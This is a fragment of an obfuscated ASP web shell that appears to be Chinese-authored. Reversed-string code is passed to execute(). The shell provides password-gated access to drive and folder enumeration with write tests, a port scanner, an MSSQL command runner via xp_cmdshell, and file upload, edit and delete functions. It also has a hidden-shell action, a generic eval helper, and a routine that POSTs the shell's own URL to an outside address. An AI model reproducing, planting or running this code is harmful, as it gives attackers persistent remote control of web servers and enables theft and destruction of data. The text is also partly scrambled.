    "&backurl:End Sub execute(shisanfun("buS dnE╋fi dnE╋1,rtS_pmeT,╁息信盘磁:╁ & evirD egasseM╋ rtS_pmeT = rtS_pmeT╋gnihtoN = OSF teS╋gnihtoN = evirDtseT teS╋fi dnE╋╁(:现发有未但,录目根盘╁ & evirD & ╁举穷已>IL<╁ & rtS_pmeT = rtS_pmeT neht 0=t fI╋txeN╋fi dnE╋))i(tsiLredloFpmeT & ╁\:╁ & evirD(rWeRcS & ╁:夹件文现发>IL<╁ & rtS_pmeT = rtS_pmeT╋1+t = t╋nehT ))i(tsiLredloFpmeT & ╁\:╁ & evirD(stsixEredloF.OSF fI╋)tsiLredloFpmeT(dnuobU ot 0 = i roF╋)╁ptft╁,╁bupmw╁,╁ptf╁,╁buptenI╁,╁seliF margorP╁,╁sgnitteS dna stnemucoD╁,╁slooT╁,╁php╁,╁psa╁,╁0002swodniw╁,╁emniw╁,╁bew╁,╁89niw╁,╁0002niw╁,╁niw╁,╁tnniw╁,╁swodniw╁(yarrA = tsiLredloFpmeT╋)╁:试测录目举穷╁(deR & ╁>IL<╁ & rtS_pmeT = rtS_pmeT╋0=t:t,tsiLredloFpmeT miD╋)╁(:读可不╁(deR & ╁:录目根盘磁>IL<╁ & rtS_pmeT = rtS_pmeT╋eslE╋gnihtoN = redloFesaB teS╋gnihtoN = redloFpmeT teS╋txeN╋)D(rWeRcS & ╁:夹件文>IL<╁ & rtS_pmeT = rtS_pmeT╋sredloFpmeT ni D hcaE roF╋sredloFbuS.redloFesaB = sredloFpmeT teS╋redloFtooR.evirDtseT = redloFesaB teS╋))╁\:╁ & evirD((rWeRcS & ╁:录目根盘磁>IL<╁ & )emaNemuloV.evirDtseT(deR & ╁:名卷盘磁>IL<╁ & ))6758401/eziSlatoT.evirDtseT(tnIC(deR & ╁:量容总盘磁>IL<╁ & )emaNerahS.evirDtseT(deR & ╁:名享共盘磁>IL<╁ & )rebmuNlaireS.evirDtseT(deR & ╁:号列序盘磁>IL<╁ & )metsySeliF.evirDtseT(deR & ╁:型类区分盘磁>IL<╁ = rtS_pmeT╋nehT ydaeRsI.evirDtseT fI╋)evirD(evirDteG.OSF = evirDtseT teS╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejboetaerC.revreS = OSF teS╋nehT ╁╁ >< evirD fI╋D,rtS_pmeT,sredloFpmeT,redloFesaB,evirDtseT,OSF miD:txeN emuseR rorrE nO╋)evirD(evirDnacS buS")) Function ScReWr(folder):execute(shisanfun("txeN emuseR rorrE nO╋rtSrWeR = rWeRcS╋gnihtoN = OSF teS╋gnihtoN = redloFtseT teS╋gnihtoN = tsiLeliFtseT teS╋fi dnE╋fi dnE╋eurT,emaneliFdnR & redlof eliFeteleD.OSF╋╁>TNOF/<。写可╁ & rtSrWeR = rtSrWeR╋eslE╋╁>TNOF/<。写可不╁ & rtSrWeR = rtSrWeR╋raelC.rre╋nehT rre fI╋eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF╋╁,读可 >dddddd#=roloc TNOF<╁ & redlof = rtSrWeR╋eslE╋fI dnE╋eurT,emaneliFdnR & redlof eliFeteleD.OSF╋╁>TNOF/<。写可╁ & rtSrWeR = rtSrWeR╋eslE╋╁>TNOF/<。写可不╁ & rtSrWeR = rtSrWeR╋raelC.rre╋nehT rre fI╋eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF╋╁,读可不 >2222ff#=roloc TNOF<╁ & redlof = rtSrWeR╋raelC.rre╋nehT rre fI╋txeN╋tsiLeliFtseT ni A hcaE roF╋╁pmt.╁ & )won(dnoceS & )won(etuniM & )won(ruoH & )won(yaD & ╁pmet\╁ = emaneliFdnR╋sredloFbuS.redloFtseT = tsiLeliFtseT teS╋)redlof(redloFteG.OSF = redloFtseT teS╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejboetaerC.revreS = OSF teS╋emaneliFdnR,rtSrWeR,tsiLeliFtseT,redloFtseT,OSF miD╋txeN emuseR rorrE nO")) End Function:function goback():execute(shisanfun("gnihton=redlofo tes╋gnihton=osfO tes╋fi dne╋╁>retnec/<>rb/<>';)1-(og.yrotsih'=kcilCno 回返=eulav nottub=epyt TUPNI<>rb<>retnec<>retnec/retnec<>tpircs/<)╁╁╁&)╁htaPredloF╁(noisseS&╁╁╁(redloFwohS>tpircs<╁ j╋ esle╋╁>tpircs/<)╁╁╁&)redloftnerap.redlofo(htaPeR&╁╁╁(redloFwohS>tpircs<╁ j╋ neht redloFtooRsI.redlofo ton fi╋))╁htaPredloF╁(noisseS(redlofteG.osfO = redlofo tes╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejbOetaerC.revreS = osfO tes")) end function:execute(shisanfun("bus dne╋2elif & ╁件文了存保>rb<╁ etirW.esnopseR╋gnihton=xsf tes ╋eurt,2elif,1elif elifypoc.xsf ╋ )╁tcejbOmetsySeliF.gnitpircS╁(tcejboetaerc=xsf tes ╋ xsf mid ╋txeN emuseR rorrE nO╋)2elif,1elif(elifkcab bus")) if session("KKK")<>UserPass then if request.form("pass")<>"" or request("pass")<>"" then if request.form("pass")=UserPass or request.form("pass")=url then session("KKK")=UserPass response.redirect url else j"


  • "&backurl end if else si="

    " if instr(SI,SIC)<>0 then j sI call promyself On Error Resume Next end if end if response.end end if sub ScanPort() Server.ScriptTimeout = 7776000 if request.Form("port")="" then PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958" else PortList=request.Form("port") end if if request.Form("ip")="" then IP="" else IP=request.Form("ip") end if j"



    " j"" j"

    Scan IP: " j" " j"
    Port List:" j"" j"

    " j"" j"" j"

    " If request.Form("scan") <> "" Then timer1 = timer j("扫描报告:

    ") tmp = Split(request.Form("port"),",") ip = Split(request.Form("ip"),",") For hu = 0 to Ubound(ip) If InStr(ip(hu),"-") = 0 Then For i = 0 To Ubound(tmp) If Isnumeric(tmp(i)) Then Call Scan(ip(hu), tmp(i)) Else seekx = InStr(tmp(i), "-") If seekx > 0 Then startN = Left(tmp(i), seekx - 1 ) endN = Right(tmp(i), Len(tmp(i)) - seekx ) If Isnumeric(startN) and Isnumeric(endN) Then For j = startN To endN Call Scan(ip(hu), j) Next Else j(startN & " or " & endN & " is not number
    ") End If Else j(tmp(i) & " is not number
    ") End If End If Next Else ipStart = Mid(ip(hu),1,InStrRev(ip(hu),".")) For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-")) For i = 0 To Ubound(tmp) If Isnumeric(tmp(i)) Then Call Scan(ipStart & xxx, tmp(i)) Else seekx = InStr(tmp(i), "-") If seekx > 0 Then startN = Left(tmp(i), seekx - 1 ) endN = Right(tmp(i), Len(tmp(i)) - seekx ) If Isnumeric(startN) and Isnumeric(endN) Then For j = startN To endN Call Scan(ipStart & xxx,j) Next Else j(startN & " or " & endN & " is not number
    ") End If Else j(tmp(i) & " is not number
    ") End If End If Next Next End If Next timer2 = timer thetime=cstr(int(timer2-timer1)) j"
    Process in "&thetime&" s" END IF end sub Sub Scan(targetip, portNum) On Error Resume Next set conn = Server.CreateObject("ADODB.connection") connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;" conn.ConnectionTimeout = 1 conn.open connstr If Err Then If Err.number = -2147217843 or Err.number = -2147467259 Then If InStr(Err.description, "(Connect()).") > 0 Then j(targetip & ":" & portNum & ".........关闭
    ") Else j(targetip & ":" & portNum & ".........开放
    ") End If End If End If End Sub Select Case Action:case "MainMenu":MainMenu() Case "EditPower" Call EditPower(request("PowerPath")) Case "SavePower" Call SavePower(request("PowerPath"),request("SaveType")) case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="
    MSSQL Commander
    Command: UserName: Password: 
    ":j SI:SI="":If trim(request.form("MMD"))<>"" Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," "," "):strResult = Replace(strResult,"<","<"):strResult = Replace(strResult,">",">"):strResult = Replace(strResult,chr(13),"
    "):End if:set adoConn = Nothing:j request.form("MMD") & "
    "& strResult:end FuncTion:function x(Posturl): dim w: w="^w^inhttp.^wi^nhttprequest.5.1": Posturl=replace(trim(Posturl),vbcrlf,""): on error resume next: set http= CreateObject(replace(w,"^","")): http.open "POST",Posturl,false: http.SetRequestHeader "REFERER", "http://"&u&request.ServerVariables("URL"):http.send: Set http=Nothing:end function: case "Alexa" dim AlexaUrl,Top: AlexaUrl=request("u"): Top=Alexa(AlexaUrl): if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&"" SI="
    ":x (mm):For i=0 To 19 SI=SI&"" Next j SI Err.Clear function il(str) execute str end function function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function case"MMD":MMD() case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing case"DownFile":DownFile FName:ShowErr() case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing case"UpFile":UpFile() case"TSearch":TSearch() case"Cmd1Shell":Cmd1Shell() case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL case"Course":Course() case"Alexa":Alexa() case"upload":upload() case"sql":sql() case"DbManager":DbManager() case"goback":goback() Case "ProFile":ProFile() case"php":php() case"apjdel":apjdel() case"hiddenshell":hiddenshell() case"datess":datess() case"aspx":aspx() case"ScanDriveForm" : ScanDriveForm case"ScanDrive" : ScanDrive Request("Drive") case"ScFolder" : ScFolder Request("Folder") Case Else MainForm() End Select if Action<>"Servu" then ShowErr() '"> %>
    服务器名 "&request.serverVariables("SERVER_NAME")&"
    服务器时间 "&now&"
    服务器CPU数量 "&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"
    服务器语种 "&request.servervariables("http_accept_language")&"
    服务器操作系统 "&Request.ServerVariables("OS")&"
    WEB服务器版本 "&Request.ServerVariables("SERVER_SOFTWARE")&"